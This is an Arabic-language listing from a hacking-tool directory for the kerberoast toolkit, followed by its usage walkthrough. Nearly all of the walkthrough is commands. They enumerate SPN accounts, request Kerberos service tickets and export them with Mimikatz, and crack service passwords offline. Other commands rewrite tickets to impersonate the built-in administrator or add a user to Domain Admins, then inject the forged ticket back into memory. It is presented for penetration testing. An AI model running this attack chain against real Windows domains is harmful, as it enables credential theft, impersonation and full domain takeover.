Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
kerberoast — مجموعة أدوات لمهاجمة تطبيقات Kerberos من مايكروسوفت: استخراج حسابات SPN، طلب وتصدير التذاكر، كسر كلمات مرور الخدمات، إعادة كتابة التذاكر للانتحال وتصعيد الامتيازات. | Kitploit
أدوات/GitHubGitHub/nidem/kerberoast
هجمات كلمات المرورالاستغلالاختبار الاختراقالمصادقة
GitHubnidem/kerberoast

kerberoast

مجموعة أدوات لمهاجمة تطبيقات Kerberos من مايكروسوفت: استخراج حسابات SPN، طلب وتصدير التذاكر، كسر كلمات مرور الخدمات، إعادة كتابة التذاكر للانتحال وتصعيد الامتيازات.

عرض المستودع
1.5k31219منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

kerberoast

Kerberoast هي مجموعة من الأدوات لمهاجمة تطبيقات Kerberos في أنظمة MS. فيما يلي نظرة عامة مختصرة على وظيفة كل أداة.

استخراج جميع الحسابات المستخدمة كـ SPN باستخدام أدوات MS المدمجة

PS C:\> setspn -T medin -Q */*

طلب التذاكر (تذكرة واحدة أو أكثر)

تذكرة واحدة:

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

جميع التذاكر

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

استخراج التذاكر المكتسبة من الذاكرة العشوائية باستخدام Mimikatz

mimikatz # kerberos::list /export

كسر التشفير باستخدام tgsrepcrack

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

إعادة الكتابة (Rewrite)

جعل المستخدم يظهر كمستخدم آخر

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

إضافة مستخدم إلى مجموعة أخرى (في هذه الحالة مسؤول المجال)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

حقن التذكرة المعدلة مرة أخرى في الذاكرة العشوائية باستخدام Mimikatz

kerberos::ptt sql.kirbi
تنزيل الأداة